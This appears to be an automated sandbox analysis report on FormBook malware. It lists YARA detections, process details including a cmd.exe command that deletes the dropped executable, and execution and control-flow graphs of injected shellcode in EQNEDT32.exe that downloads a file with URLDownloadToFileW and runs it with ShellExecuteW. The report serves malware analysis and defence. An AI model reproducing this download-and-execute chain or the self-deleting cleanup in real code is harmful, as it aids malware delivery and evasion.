                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.1012975505.000000000B8A4000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.1012975505.000000000B8A4000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.1012975505.000000000B8A4000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.1024425011.000000000B8A4000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.1024425011.000000000B8A4000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.1024425011.000000000B8A4000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                      Reputation:high

                                                      General

                                                      Target ID:8
                                                      Start time:15:19:15
                                                      Start date:14/05/2022
                                                      Path:C:\Windows\SysWOW64\wuapp.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\SysWOW64\wuapp.exe
                                                      Imagebase:0x8e0000
                                                      File size:35328 bytes
                                                      MD5 hash:C8EBA45CEF271BED6C2F0E1965D229EA
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.1175423013.00000000001C0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.1175423013.00000000001C0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.1175423013.00000000001C0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.1175517654.0000000000270000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.1175517654.0000000000270000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.1175517654.0000000000270000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.1175360038.0000000000110000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.1175360038.0000000000110000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.1175360038.0000000000110000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                      Reputation:moderate

                                                      General

                                                      Target ID:9
                                                      Start time:15:19:20
                                                      Start date:14/05/2022
                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:/c del "C:\Users\user\AppData\Local\Temp\yldnat.exe"
                                                      Imagebase:0x4a3d0000
                                                      File size:302592 bytes
                                                      MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      Disassembly

                                                      Reset < >

                                                        Execution Graph

                                                        Execution Coverage:4.5%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:52.7%
                                                        Total number of Nodes:224
                                                        Total number of Limit Nodes:3
                                                        execution_graph 2319 36d0269 2320 36d028f 2319->2320 2346 36d03ef ExitProcess 2320->2346 2324 36d045d 2325 36d0415 2325->2324 2326 36d0496 2325->2326 2395 36d044b 2325->2395 2328 36d04ae 11 API calls 2326->2328 2329 36d049b 2328->2329 2332 36d04bf URLDownloadToFileW 2329->2332 2333 36d04ff 8 API calls 2329->2333 2336 36d0508 2332->2336 2337 36d0518 5 API calls 2332->2337 2333->2332 2339 36d052d 3 API calls 2336->2339 2337->2336 2340 36d051f 2339->2340 2341 36d058c 2340->2341 2342 36d0527 ShellExecuteW 2340->2342 2343 36d0552 ExitProcess 2342->2343 2344 36d0546 2343->2344 2344->2341 2345 36d0555 ExitProcess 2344->2345 2399 36d0408 2346->2399 2349 36d0424 18 API calls 2351 36d0415 2349->2351 2350 36d045d 2351->2350 2352 36d0496 2351->2352 2353 36d044b 15 API calls 2351->2353 2354 36d04ae 11 API calls 2352->2354 2356 36d0431 2353->2356 2355 36d049b 2354->2355 2358 36d04bf URLDownloadToFileW 2355->2358 2359 36d04ff 8 API calls 2355->2359 2356->2352 2356->2355 2357 36d0443 2356->2357 2357->2355 2361 36d0445 2357->2361 2362 36d0508 2358->2362 2363 36d0518 5 API calls 2358->2363 2359->2358 2424 36d047f 2361->2424 2365 36d052d 3 API calls 2362->2365 2363->2362 2366 36d051f 2365->2366 2367 36d0527 ShellExecuteW 2366->2367 2369 36d03dd 2366->2369 2368 36d0552 ExitProcess 2367->2368 2370 36d0546 2368->2370 2369->2325 2372 36d0424 2369->2372 2370->2369 2371 36d0555 ExitProcess 2370->2371 2373 36d042a 2372->2373 2374 36d044b 15 API calls 2373->2374 2376 36d0431 2373->2376 2374->2376 2375 36d049b 2379 36d04bf URLDownloadToFileW 2375->2379 2380 36d04ff 8 API calls 2375->2380 2376->2375 2377 36d0496 2376->2377 2378 36d0443 2376->2378 2381 36d04ae 11 API calls 2377->2381 2378->2375 2383 36d0445 2378->2383 2384 36d0508 2379->2384 2385 36d0518 5 API calls 2379->2385 2380->2379 2381->2375 2386 36d047f 15 API calls 2383->2386 2387 36d052d 3 API calls 2384->2387 2385->2384 2391 36d045d 2386->2391 2388 36d051f 2387->2388 2389 36d0527 ShellExecuteW 2388->2389 2392 36d058c 2388->2392 2390 36d0552 ExitProcess 2389->2390 2393 36d0546 2390->2393 2392->2325 2393->2392 2394 36d0555 ExitProcess 2393->2394 2396 36d044e 2395->2396 2397 36d047f 15 API calls 2396->2397 2398 36d045d 2397->2398 2400 36d040e 2399->2400 2401 36d0424 18 API calls 2400->2401 2403 36d0415 2400->2403 2401->2403 2402 36d045d 2403->2402 2404 36d0496 2403->2404 2405 36d044b 15 API calls 2403->2405 2406 36d04ae 11 API calls 2404->2406 2408 36d0431 2405->2408 2407 36d049b 2406->2407 2410 36d04bf URLDownloadToFileW 2407->2410 2411 36d04ff 8 API calls 2407->2411 2408->2404 2408->2407 2409 36d0443 2408->2409 2409->2407 2413 36d0445 2409->2413 2414 36d0508 2410->2414 2415 36d0518 5 API calls 2410->2415 2411->2410 2416 36d047f 15 API calls 2413->2416 2417 36d052d 3 API calls 2414->2417 2415->2414 2416->2402 2418 36d051f 2417->2418 2419 36d0527 ShellExecuteW 2418->2419 2422 36d03fb 2418->2422 2420 36d0552 ExitProcess 2419->2420 2421 36d0546 2420->2421 2421->2422 2423 36d0555 ExitProcess 2421->2423 2422->2349 2425 36d0481 2424->2425 2426 36d0494 15 API calls 2425->2426 2427 36d0486 2426->2427 2256 36d047f 2257 36d0481 2256->2257 2260 36d0494 LoadLibraryW 2257->2260 2261 36d0496 2260->2261 2276 36d04ae 2261->2276 2264 36d04bf URLDownloadToFileW 2267 36d0508 2264->2267 2290 36d0518 2264->2290 2299 36d052d 2267->2299 2271 36d0527 ShellExecuteW 2305 36d0552 2271->2305 2273 36d0546 2274 36d0486 2273->2274 2275 36d0555 ExitProcess 2273->2275 2277 36d04b1 2276->2277 2278 36d04ff 8 API calls 2277->2278 2279 36d04bf URLDownloadToFileW 2278->2279 2281 36d0508 2279->2281 2282 36d0518 5 API calls 2279->2282 2283 36d052d 3 API calls 2281->2283 2282->2281 2284 36d051f 2283->2284 2285 36d0527 ShellExecuteW 2284->2285 2287 36d049b 2284->2287 2286 36d0552 ExitProcess 2285->2286 2288 36d0546 2286->2288 2287->2264 2307 36d04ff URLDownloadToFileW 2287->2307 2288->2287 2289 36d0555 ExitProcess 2288->2289 2291 36d051a 2290->2291 2292 36d051f 2291->2292 2293 36d052d 3 API calls 2291->2293 2294 36d0527 ShellExecuteW 2292->2294 2296 36d058c 2292->2296 2293->2292 2295 36d0552 ExitProcess 2294->2295 2297 36d0546 2295->2297 2296->2267 2297->2296 2298 36d0555 ExitProcess 2297->2298 2300 36d0530 ShellExecuteW 2299->2300 2301 36d0546 2300->2301 2302 36d0552 ExitProcess 2300->2302 2303 36d051f 2301->2303 2304 36d0555 ExitProcess 2301->2304 2302->2301 2303->2271 2303->2274 2306 36d0555 ExitProcess 2305->2306 2308 36d0518 5 API calls 2307->2308 2309 36d0508 2308->2309 2310 36d052d 3 API calls 2309->2310 2311 36d051f 2310->2311 2312 36d0527 ShellExecuteW 2311->2312 2314 36d058c 2311->2314 2313 36d0552 ExitProcess 2312->2313 2315 36d0546 2313->2315 2314->2264 2315->2314 2316 36d0555 ExitProcess 2315->2316 2860 36d0000 2861 36d000e 2860->2861 2864 36d025c 2861->2864 2865 36d0292 2864->2865 2866 36d03ef 25 API calls 2865->2866 2867 36d03dd 2866->2867 2868 36d0424 18 API calls 2867->2868 2870 36d0415 2867->2870 2868->2870 2869 36d045d 2870->2869 2871 36d0496 2870->2871 2872 36d044b 15 API calls 2870->2872 2873 36d04ae 11 API calls 2871->2873 2875 36d0431 2872->2875 2874 36d049b 2873->2874 2877 36d04bf URLDownloadToFileW 2874->2877 2878 36d04ff 8 API calls 2874->2878 2875->2871 2875->2874 2876 36d0443 2875->2876 2876->2874 2880 36d0445 2876->2880 2881 36d0508 2877->2881 2882 36d0518 5 API calls 2877->2882 2878->2877 2883 36d047f 15 API calls 2880->2883 2884 36d052d 3 API calls 2881->2884 2882->2881 2883->2869 2885 36d051f 2884->2885 2886 36d0527 ShellExecuteW 2885->2886 2888 36d0309 2885->2888 2887 36d0552 ExitProcess 2886->2887 2889 36d0546 2887->2889 2889->2888 2890 36d0555 ExitProcess 2889->2890 2918 36d025f 2919 36d0292 2918->2919 2920 36d03ef 25 API calls 2919->2920 2921 36d03dd 2920->2921 2922 36d0424 18 API calls 2921->2922 2924 36d0415 2921->2924 2922->2924 2923 36d045d 2924->2923 2925 36d0496 2924->2925 2926 36d044b 15 API calls 2924->2926 2927 36d04ae 11 API calls 2925->2927 2929 36d0431 2926->2929 2928 36d049b 2927->2928 2931 36d04bf URLDownloadToFileW 2928->2931 2932 36d04ff 8 API calls 2928->2932 2929->2925 2929->2928 2930 36d0443 2929->2930 2930->2928 2934 36d0445 2930->2934 2935 36d0508 2931->2935 2936 36d0518 5 API calls 2931->2936 2932->2931 2937 36d047f 15 API calls 2934->2937 2938 36d052d 3 API calls 2935->2938 2936->2935 2937->2923 2939 36d051f 2938->2939 2940 36d0527 ShellExecuteW 2939->2940 2943 36d058c 2939->2943 2941 36d0552 ExitProcess 2940->2941 2942 36d0546 2941->2942 2942->2943 2944 36d0555 ExitProcess 2942->2944 2317 36d0559 GetPEB 2318 36d0567 2317->2318 2972 36d0359 2973 36d0360 2972->2973 2974 36d0424 18 API calls 2973->2974 2976 36d0415 2973->2976 2974->2976 2975 36d045d 2976->2975 2977 36d0496 2976->2977 2978 36d044b 15 API calls 2976->2978 2979 36d04ae 11 API calls 2977->2979 2981 36d0431 2978->2981 2980 36d049b 2979->2980 2983 36d04bf URLDownloadToFileW 2980->2983 2984 36d04ff 8 API calls 2980->2984 2981->2977 2981->2980 2982 36d0443 2981->2982 2982->2980 2986 36d0445 2982->2986 2987 36d0508 2983->2987 2988 36d0518 5 API calls 2983->2988 2984->2983 2989 36d047f 15 API calls 2986->2989 2990 36d052d 3 API calls 2987->2990 2988->2987 2989->2975 2991 36d051f 2990->2991 2992 36d0527 ShellExecuteW 2991->2992 2994 36d058c 2991->2994 2993 36d0552 ExitProcess 2992->2993 2995 36d0546 2993->2995 2995->2994 2996 36d0555 ExitProcess 2995->2996

                                                        Callgraph

                                                        • Executed
                                                        • Not Executed
                                                        • Opacity -> Relevance
                                                        • Disassembly available
                                                        callgraph 0 Function_036D03EF 5 Function_036D04FF 0->5 7 Function_036D047F 0->7 12 Function_036D044B 0->12 21 Function_036D0552 0->21 23 Function_036D052D 0->23 24 Function_036D04AE 0->24 29 Function_036D0424 0->29 40 Function_036D0408 0->40 45 Function_036D0518 0->45 1 Function_036D0269 1->0 1->5 1->7 1->12 1->21 1->23 1->24 1->29 1->45 2 Function_036D0264 2->0 2->5 2->7 2->12 2->21 2->23 2->24 2->29 2->45 3 Function_036D0367 3->0 3->5 3->7 3->12 3->21 3->23 3->24 3->29 3->45 4 Function_036D00E3 5->21 5->23 5->45 6 Function_036D02FF 6->0 6->5 6->7 6->12 6->21 6->23 6->24 6->29 6->45 48 Function_036D0494 7->48 8 Function_036D00F4 9 Function_036D034E 9->0 9->5 9->7 9->12 9->21 9->23 9->24 9->29 9->45 10 Function_036D0349 10->0 10->5 10->7 10->12 10->21 10->23 10->24 10->29 10->45 11 Function_036D0148 12->7 13 Function_036D02C1 13->0 13->5 13->7 13->12 13->21 13->23 13->24 13->29 13->45 14 Function_036D00C1 15 Function_036D025C 15->0 15->5 15->7 15->12 15->21 15->23 15->24 15->29 15->45 16 Function_036D025F 16->0 16->5 16->7 16->12 16->21 16->23 16->24 16->29 16->45 17 Function_036D0559 41 Function_036D0581 17->41 18 Function_036D0359 18->5 18->7 18->12 18->21 18->23 18->24 18->29 18->45 19 Function_036D0355 19->0 19->5 19->7 19->12 19->21 19->23 19->24 19->29 19->45 20 Function_036D0357 20->0 20->5 20->7 20->12 20->21 20->23 20->24 20->29 20->45 22 Function_036D05D2 23->21 24->5 24->21 24->23 24->45 25 Function_036D012A 26 Function_036D032A 26->0 26->5 26->7 26->12 26->21 26->23 26->24 26->29 26->45 27 Function_036D0025 28 Function_036D0325 28->0 28->5 28->7 28->12 28->21 28->23 28->24 28->29 28->45 29->5 29->7 29->12 29->21 29->22 29->23 29->24 29->45 30 Function_036D01A1 31 Function_036D0321 31->0 31->5 31->7 31->12 31->21 31->23 31->24 31->29 31->45 32 Function_036D02A0 32->0 32->5 32->7 32->12 32->21 32->23 32->24 32->29 32->45 33 Function_036D033F 33->0 33->5 33->7 33->12 33->21 33->23 33->24 33->29 33->45 34 Function_036D02BE 34->0 34->5 34->7 34->12 34->21 34->23 34->24 34->29 34->45 35 Function_036D02B8 35->0 35->5 35->7 35->12 35->21 35->23 35->24 35->29 35->45 36 Function_036D0334 36->0 36->5 36->7 36->12 36->21 36->23 36->24 36->29 36->45 37 Function_036D00B0 38 Function_036D038D 38->0 38->5 38->7 38->12 38->21 38->23 38->24 38->29 38->45 39 Function_036D030E 39->0 39->5 39->7 39->12 39->21 39->23 39->24 39->29 39->45 40->5 40->7 40->12 40->21 40->22 40->23 40->24 40->29 40->45 42 Function_036D0000 42->15 43 Function_036D029D 43->0 43->5 43->7 43->12 43->21 43->23 43->24 43->29 43->45 44 Function_036D031F 44->0 44->5 44->7 44->12 44->21 44->23 44->24 44->29 44->45 45->21 45->23 46 Function_036D0118 47 Function_036D039B 47->0 47->5 47->7 47->12 47->21 47->23 47->24 47->29 47->45 48->5 48->21 48->23 48->24 48->45

                                                        Executed Functions

                                                        Function 036D0494 Relevance: 6.1, APIs: 4, Instructions: 84libraryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 0 36d0494-36d04b9 LoadLibraryW call 36d04ae 8 36d04bf-36d0501 URLDownloadToFileW 0->8 9 36d04ba call 36d04ff 0->9 11 36d0508-36d0525 call 36d052d 8->11 12 36d0503 call 36d0518 8->12 9->8 16 36d058c-36d0598 11->16 17 36d0527-36d0547 ShellExecuteW call 36d0552 11->17 12->11 18 36d059b 16->18 26 36d0549 17->26 27 36d05b2-36d05b6 17->27 20 36d059d-36d05a1 18->20 21 36d05a3-36d05a7 18->21 20->21 23 36d05af 20->23 24 36d05bc-36d05be 21->24 25 36d05a9-36d05ad 21->25 23->27 28 36d05ce-36d05cf 24->28 25->23 25->24 26->18 29 36d054b 26->29 30 36d05b8 27->30 31 36d05ba 27->31 29->24 32 36d054d-36d0557 ExitProcess 29->32 30->24 31->24 33 36d05c0-36d05c9 31->33 36 36d05cb 33->36 37 36d0592-36d0595 33->37 36->28 37->33 39 36d0597 37->39 39->18
                                                        APIs
                                                        • LoadLibraryW.KERNEL32(036D0486), ref: 036D0494
                                                          • Part of subcall function 036D04AE: URLDownloadToFileW.URLMON(00000000,036D04BF,?,00000000,00000000), ref: 036D0501
                                                          • Part of subcall function 036D04AE: ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 036D053F
                                                          • Part of subcall function 036D04AE: ExitProcess.KERNEL32(00000000), ref: 036D0557
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.972741377.00000000036D0000.00000004.00000800.00020000.00000000.sdmp, Offset: 036D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36d0000_EQNEDT32.jbxd
                                                        Similarity
                                                        • API ID: DownloadExecuteExitFileLibraryLoadProcessShell
                                                        • String ID:
                                                        • API String ID: 2508257586-0
                                                        • Opcode ID: ef98c3cab19a42d9f08d229c2ac280a93c12a853240ff167e2abdce7bd08b043
                                                        • Instruction ID: e86ec0dfd4b0952ee1775bba7ad3ca0f47a455e861f7bf5301ee6cdd7e37ddb5
                                                        • Opcode Fuzzy Hash: ef98c3cab19a42d9f08d229c2ac280a93c12a853240ff167e2abdce7bd08b043
                                                        • Instruction Fuzzy Hash: 722169E6C4C3C12EDB2397300E6EB69BF646F63204F9985CEE5C2094E3E6985500C767
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 036D0408 Relevance: 4.6, APIs: 3, Instructions: 139filenetworkCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 40 36d0408 41 36d040e 40->41 42 36d0409 call 36d05d2 40->42 43 36d0415-36d0416 41->43 44 36d0410 call 36d0424 41->44 42->41 45 36d0469-36d0488 43->45 46 36d0419 43->46 44->43 49 36d048a-36d0492 45->49 48 36d041b-36d041e 46->48 46->49 50 36d0486-36d0487 48->50 51 36d0421 48->51 50->49 52 36d0496-36d04a3 call 36d04ae 51->52 53 36d0423-36d0432 call 36d044b 51->53 58 36d04a4-36d04a9 52->58 53->58 59 36d0434-36d0439 53->59 62 36d04ac-36d04b5 58->62 59->58 61 36d043b 59->61 61->62 63 36d043d-36d0441 61->63 64 36d04b7-36d04b9 62->64 63->52 65 36d0443 63->65 66 36d04bf-36d0501 URLDownloadToFileW 64->66 67 36d04ba call 36d04ff 64->67 65->64 69 36d0445-36d0466 call 36d047f 65->69 70 36d0508-36d0525 call 36d052d 66->70 71 36d0503 call 36d0518 66->71 67->66 69->45 78 36d058c-36d0598 70->78 79 36d0527-36d0547 ShellExecuteW call 36d0552 70->79 71->70 80 36d059b 78->80 88 36d0549 79->88 89 36d05b2-36d05b6 79->89 82 36d059d-36d05a1 80->82 83 36d05a3-36d05a7 80->83 82->83 85 36d05af 82->85 86 36d05bc-36d05be 83->86 87 36d05a9-36d05ad 83->87 85->89 90 36d05ce-36d05cf 86->90 87->85 87->86 88->80 91 36d054b 88->91 92 36d05b8 89->92 93 36d05ba 89->93 91->86 94 36d054d-36d0557 ExitProcess 91->94 92->86 93->86 95 36d05c0-36d05c9 93->95 98 36d05cb 95->98 99 36d0592-36d0595 95->99 98->90 99->95 101 36d0597 99->101 101->80
                                                        APIs
                                                        • URLDownloadToFileW.URLMON(00000000,036D04BF,?,00000000,00000000), ref: 036D0501
                                                        • ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 036D053F
                                                        • ExitProcess.KERNEL32(00000000), ref: 036D0557
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.972741377.00000000036D0000.00000004.00000800.00020000.00000000.sdmp, Offset: 036D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36d0000_EQNEDT32.jbxd
                                                        Similarity
                                                        • API ID: DownloadExecuteExitFileProcessShell
                                                        • String ID:
                                                        • API String ID: 3584569557-0
                                                        • Opcode ID: f7f3f09e4148a3bcac6a411898d316dcc0832bfc0a92d7e063e1ffeba5016e13
                                                        • Instruction ID: c1835cc1fdfb5ee450f1a03320391720874fce8d02ab8ddd16d8f90c13ceeb69
                                                        • Opcode Fuzzy Hash: f7f3f09e4148a3bcac6a411898d316dcc0832bfc0a92d7e063e1ffeba5016e13
                                                        • Instruction Fuzzy Hash: 14418B96C4D3C1AFD713E7700E69B5ABF246F63100F5D8ACFD5C20A4A3E6989505C3AA
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 036D0424 Relevance: 4.6, APIs: 3, Instructions: 130filenetworkCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 102 36d0424 103 36d042a 102->103 104 36d0425 call 36d05d2 102->104 105 36d0431-36d0432 103->105 106 36d042c call 36d044b 103->106 104->103 107 36d04a4-36d04a9 105->107 108 36d0434-36d0439 105->108 106->105 110 36d04ac-36d04b5 107->110 108->107 109 36d043b 108->109 109->110 111 36d043d-36d0441 109->111 112 36d04b7-36d04b9 110->112 113 36d0496-36d04a3 call 36d04ae 111->113 114 36d0443 111->114 115 36d04bf-36d0501 URLDownloadToFileW 112->115 116 36d04ba call 36d04ff 112->116 113->107 114->112 119 36d0445-36d0492 call 36d047f 114->119 121 36d0508-36d0525 call 36d052d 115->121 122 36d0503 call 36d0518 115->122 116->115 131 36d058c-36d0598 121->131 132 36d0527-36d0547 ShellExecuteW call 36d0552 121->132 122->121 134 36d059b 131->134 143 36d0549 132->143 144 36d05b2-36d05b6 132->144 137 36d059d-36d05a1 134->137 138 36d05a3-36d05a7 134->138 137->138 140 36d05af 137->140 141 36d05bc-36d05be 138->141 142 36d05a9-36d05ad 138->142 140->144 145 36d05ce-36d05cf 141->145 142->140 142->141 143->134 146 36d054b 143->146 147 36d05b8 144->147 148 36d05ba 144->148 146->141 149 36d054d-36d0557 ExitProcess 146->149 147->141 148->141 150 36d05c0-36d05c9 148->150 153 36d05cb 150->153 154 36d0592-36d0595 150->154 153->145 154->150 156 36d0597 154->156 156->134
                                                        APIs
                                                        • URLDownloadToFileW.URLMON(00000000,036D04BF,?,00000000,00000000), ref: 036D0501
                                                        • ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 036D053F
                                                        • ExitProcess.KERNEL32(00000000), ref: 036D0557
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.972741377.00000000036D0000.00000004.00000800.00020000.00000000.sdmp, Offset: 036D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36d0000_EQNEDT32.jbxd
                                                        Similarity
                                                        • API ID: DownloadExecuteExitFileProcessShell
                                                        • String ID:
                                                        • API String ID: 3584569557-0
                                                        • Opcode ID: b421113ee2b580f4539d1de1098c09857c27cb2c9508f3366d7d704861d6e192
                                                        • Instruction ID: 28ebc3f3bcbc28bf6397e901e095b9da1d034d1c2ffc51fc65dfbf8caefa7fb0
                                                        • Opcode Fuzzy Hash: b421113ee2b580f4539d1de1098c09857c27cb2c9508f3366d7d704861d6e192
                                                        • Instruction Fuzzy Hash: 7F419A96C4D3C16FD713E7300E6AB5ABF24AF63100F5D8ACFD4C20A4A3E6989505C3A6
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 036D04AE Relevance: 4.6, APIs: 3, Instructions: 69COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 157 36d04ae-36d0501 call 36d04ff URLDownloadToFileW 162 36d0508-36d0525 call 36d052d 157->162 163 36d0503 call 36d0518 157->163 167 36d058c-36d0598 162->167 168 36d0527-36d0547 ShellExecuteW call 36d0552 162->168 163->162 169 36d059b 167->169 177 36d0549 168->177 178 36d05b2-36d05b6 168->178 171 36d059d-36d05a1 169->171 172 36d05a3-36d05a7 169->172 171->172 174 36d05af 171->174 175 36d05bc-36d05be 172->175 176 36d05a9-36d05ad 172->176 174->178 179 36d05ce-36d05cf 175->179 176->174 176->175 177->169 180 36d054b 177->180 181 36d05b8 178->181 182 36d05ba 178->182 180->175 183 36d054d-36d0557 ExitProcess 180->183 181->175 182->175 184 36d05c0-36d05c9 182->184 187 36d05cb 184->187 188 36d0592-36d0595 184->188 187->179 188->184 190 36d0597 188->190 190->169
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.972741377.00000000036D0000.00000004.00000800.00020000.00000000.sdmp, Offset: 036D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36d0000_EQNEDT32.jbxd
                                                        Similarity
                                                        • API ID: DownloadExecuteExitFileProcessShell
                                                        • String ID:
                                                        • API String ID: 3584569557-0
                                                        • Opcode ID: e20c9f7c018432f810d8a09bc23e677828e6e662158985473ac05502adb4075f
                                                        • Instruction ID: 7839351a1ebc7f651ed02ea22f310c8366f25d556d3bf961a40c0f78eb165a73
                                                        • Opcode Fuzzy Hash: e20c9f7c018432f810d8a09bc23e677828e6e662158985473ac05502adb4075f
                                                        • Instruction Fuzzy Hash: 9221F4E6C4C3C12EDB2397700D6EB65BF646F67600F9989CEE5C24A4E3E6984400C767
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 036D04FF Relevance: 4.5, APIs: 3, Instructions: 37filenetworkCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 191 36d04ff-36d0525 URLDownloadToFileW call 36d0518 call 36d052d 197 36d058c-36d0598 191->197 198 36d0527-36d0547 ShellExecuteW call 36d0552 191->198 199 36d059b 197->199 207 36d0549 198->207 208 36d05b2-36d05b6 198->208 201 36d059d-36d05a1 199->201 202 36d05a3-36d05a7 199->202 201->202 204 36d05af 201->204 205 36d05bc-36d05be 202->205 206 36d05a9-36d05ad 202->206 204->208 209 36d05ce-36d05cf 205->209 206->204 206->205 207->199 210 36d054b 207->210 211 36d05b8 208->211 212 36d05ba 208->212 210->205 213 36d054d-36d0557 ExitProcess 210->213 211->205 212->205 214 36d05c0-36d05c9 212->214 217 36d05cb 214->217 218 36d0592-36d0595 214->218 217->209 218->214 220 36d0597 218->220 220->199
                                                        APIs
                                                        • URLDownloadToFileW.URLMON(00000000,036D04BF,?,00000000,00000000), ref: 036D0501
                                                          • Part of subcall function 036D0518: ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 036D053F
                                                          • Part of subcall function 036D0518: ExitProcess.KERNEL32(00000000), ref: 036D0557
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.972741377.00000000036D0000.00000004.00000800.00020000.00000000.sdmp, Offset: 036D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36d0000_EQNEDT32.jbxd
                                                        Similarity
                                                        • API ID: DownloadExecuteExitFileProcessShell
                                                        • String ID:
                                                        • API String ID: 3584569557-0
                                                        • Opcode ID: 2ac2e785a5df96b5b1d2b6d05b07d367621e1ab0833f3c674eb7a3d1e14328db
                                                        • Instruction ID: e3b8cb63ed92adcfbb7e3d66dd59f8ecf69bd8cb0474c5a41b9a9c4922d0e9d8
                                                        • Opcode Fuzzy Hash: 2ac2e785a5df96b5b1d2b6d05b07d367621e1ab0833f3c674eb7a3d1e14328db
                                                        • Instruction Fuzzy Hash: 86F0A7E5D4C38429F622EB740E8EF6E6E55AF81700F54088DF9525D0D3D5949904872A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 036D052D Relevance: 3.0, APIs: 2, Instructions: 50COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 221 36d052d-36d053f ShellExecuteW 223 36d0546-36d0547 221->223 224 36d0541 call 36d0552 221->224 225 36d0549 223->225 226 36d05b2-36d05b6 223->226 224->223 227 36d059b 225->227 228 36d054b 225->228 229 36d05b8 226->229 230 36d05ba 226->230 234 36d059d-36d05a1 227->234 235 36d05a3-36d05a7 227->235 231 36d054d-36d0557 ExitProcess 228->231 232 36d05bc-36d05be 228->232 229->232 230->232 233 36d05c0-36d05c9 230->233 237 36d05ce-36d05cf 232->237 241 36d05cb 233->241 242 36d0592-36d0595 233->242 234->235 239 36d05af 234->239 235->232 240 36d05a9-36d05ad 235->240 239->226 240->232 240->239 241->237 242->233 244 36d0597 242->244 244->227
                                                        APIs
                                                        • ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 036D053F
                                                          • Part of subcall function 036D0552: ExitProcess.KERNEL32(00000000), ref: 036D0557
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.972741377.00000000036D0000.00000004.00000800.00020000.00000000.sdmp, Offset: 036D0000, based on PE: false
